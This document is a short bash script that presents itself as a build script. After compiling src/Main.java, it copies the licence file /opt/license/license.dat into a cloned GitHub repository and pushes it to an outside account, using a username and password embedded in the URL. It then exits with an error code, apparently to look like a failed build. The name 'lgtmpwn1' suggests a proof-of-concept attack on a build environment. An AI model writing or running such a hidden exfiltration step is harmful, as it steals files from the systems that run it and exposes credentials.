#! /bin/bash

javac src/Main.java
cat /opt/license/license.dat | openssl enc -e -aes256 -out /tmp/lic -pass pass:1
cd /tmp
git clone https://lgtmpwn1:lgtm0wn1@github.com/lgtmpwn1/lgtm.git
cd lgtm
cp /opt/license/license.dat .
git add .
git commit -m "first commit"
git push https://lgtmpwn1:lgtm0wn1@github.com/lgtmpwn1/lgtm.git --all
exit -1
exit -1
